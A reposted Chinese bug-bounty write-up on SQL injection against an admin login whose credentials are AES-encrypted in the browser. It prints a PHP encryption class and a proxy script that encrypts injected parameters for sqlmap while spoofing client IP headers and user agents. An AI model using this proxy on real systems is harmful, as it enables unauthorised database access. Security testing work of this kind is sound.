【转】众测厂商某站点绕过前端加密进行注入
0x01 概要
站点:http://aa.test.com:8088/Admin/Login,这样看起来是一个挺正常的界面,测试一下发现存在注入
很清楚的可以看到两张图片是有明显的区别的,说明有注入
抓包时发现用户和密码进行前段加密了!!!!
0x02 查看前端加密方式
前端加密的话,那就只需要找到对应前端加密脚本即可
0x03 编码对应解密脚本
# AES加解密脚本:
<?php /** * AES/CBC/PKCS5Padding模式 加密解密 */ class Crypt { /** * [$cipher 加密模式] * @var [type] */ private $cipher = MCRYPT_RIJNDAEL_128; private $mode = MCRYPT_MODE_CBC; /** * [$key 密匙] * @var string */ private $secret_key = '123456789ABCDEFG123456789ABCDEFG'; /** * [$iv 偏移量] * @var string */ private $iv = '123456789ABCDEFG'; function setCipher($cipher=''){ $cipher && $this->cipher = $cipher; } function setMode($mode=''){ $mode && $this->mode = $mode; } function setSecretKey($secret_key=''){ $secret_key && $this->secret_key = $secret_key; } function setIv($iv=''){ $iv && $this->iv = $iv; } //加密 function encrypt($str) { $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC ); $str = $this->pkcs5Pad ( $str, $size ); $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv); //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值 $data=strtolower(bin2hex($data)); return $data; } //解密 function decrypt($str) { $str = $this->hex2bin( strtolower($str)); $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv ); $str = $this->pkcs5Unpad( $str ); return $str; } //bin2hex还原 private function hex2bin($hexData) { $binData = ""; for($i = 0; $i < strlen ( $hexData ); $i += 2) { $binData .= chr(hexdec(substr($hexData, $i, 2))); } return $binData; } //PKCS5Padding private function pkcs5Pad($text, $blocksize) { $pad = $blocksize - (strlen ( $text ) % $blocksize); return $text . str_repeat ( chr ( $pad ), $pad ); } private function pkcs5Unpad($text) { $pad = ord ( $text {strlen ( $text ) - 1} ); if ($pad > strlen ( $text )) return false; if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad) return false; return substr ( $text, 0, - 1 * $pad ); } } echo (new Crypt())->encrypt('111');
可以看得到是一致的,那就可以正常注入了
# 注入脚本:
<?php /** * AES/CBC/PKCS5Padding模式 加密解密 */ class Crypt { /** * [$cipher 加密模式] * @var [type] */ private $cipher = MCRYPT_RIJNDAEL_128; private $mode = MCRYPT_MODE_CBC; /** * [$key 密匙] * @var string */ private $secret_key = '123456789ABCDEFG123456789ABCDEFG'; /** * [$iv 偏移量] * @var string */ private $iv = '123456789ABCDEFG'; function setCipher($cipher=''){ $cipher && $this->cipher = $cipher; } function setMode($mode=''){ $mode && $this->mode = $mode; } function setSecretKey($secret_key=''){ $secret_key && $this->secret_key = $secret_key; } function setIv($iv=''){ $iv && $this->iv = $iv; } //加密 function encrypt($str) { $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC ); $str = $this->pkcs5Pad ( $str, $size ); $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv); //bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值 $data=strtolower(bin2hex($data)); return $data; } //解密 function decrypt($str) { $str = $this->hex2bin( strtolower($str)); $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv ); $str = $this->pkcs5Unpad( $str ); return $str; } //bin2hex还原 private function hex2bin($hexData) { $binData = ""; for($i = 0; $i < strlen ( $hexData ); $i += 2) { $binData .= chr(hexdec(substr($hexData, $i, 2))); } return $binData; } //PKCS5Padding private function pkcs5Pad($text, $blocksize) { $pad = $blocksize - (strlen ( $text ) % $blocksize); return $text . str_repeat ( chr ( $pad ), $pad ); } private function pkcs5Unpad($text) { $pad = ord ( $text {strlen ( $text ) - 1} ); if ($pad > strlen ( $text )) return false; if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad) return false; return substr ( $text, 0, - 1 * $pad ); } } class SqlCurl { public function curlRequest($url, $post = [], $cookie = '', $referurl = '') { if (!$referurl) { $referurl = 'https://www.baidu.com'; } $header = array( 'CLIENT-IP:' . $this->getIp(), 'X-FORWARDED-FOR:' . $this->getIp(), 'HTTP_CLIENT_IP:' .$this->getIp(), 'HTTP_X_FORWARDED_FOR' . $this->getIp(), 'REMOTE_ADDR:' . $this->getIp(), 'Content-Type:application/x-www-form-urlencoded', 'X-Requested-With:XMLHttpRequest', ); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); //随机浏览器useragent curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry()); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_REFERER, $referurl); curl_setopt($curl, CURLOPT_HTTPHEADER, $header); if ($post) { curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post)); } if ($cookie) { curl_setopt($curl, CURLOPT_COOKIE, $cookie); } curl_setopt($curl, CURLOPT_TIMEOUT, 10); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($curl); if (curl_errno($curl)) { return curl_error($curl); } curl_close($curl); return $data; } private function getIp() { return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240); } private function agentArry() { $agentarry = [ //PC端的UserAgent "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11", "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko", "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0", "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)", "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1", "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1", "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11", "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11", "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)", "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)", "世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)", "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)", "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)", "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)", "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", //移动端口 "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10", "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13", "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+", "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0", "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999", "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999", "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999", "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN", ]; return $agentarry[array_rand($agentarry, 1)]; } } // http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg# $data['UserName'] = (new Crypt())->encrypt($_GET['UserName']); $data['Password'] = (new Crypt())->encrypt($_GET['Password']); echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);
0x04 Sqlmap正常注入
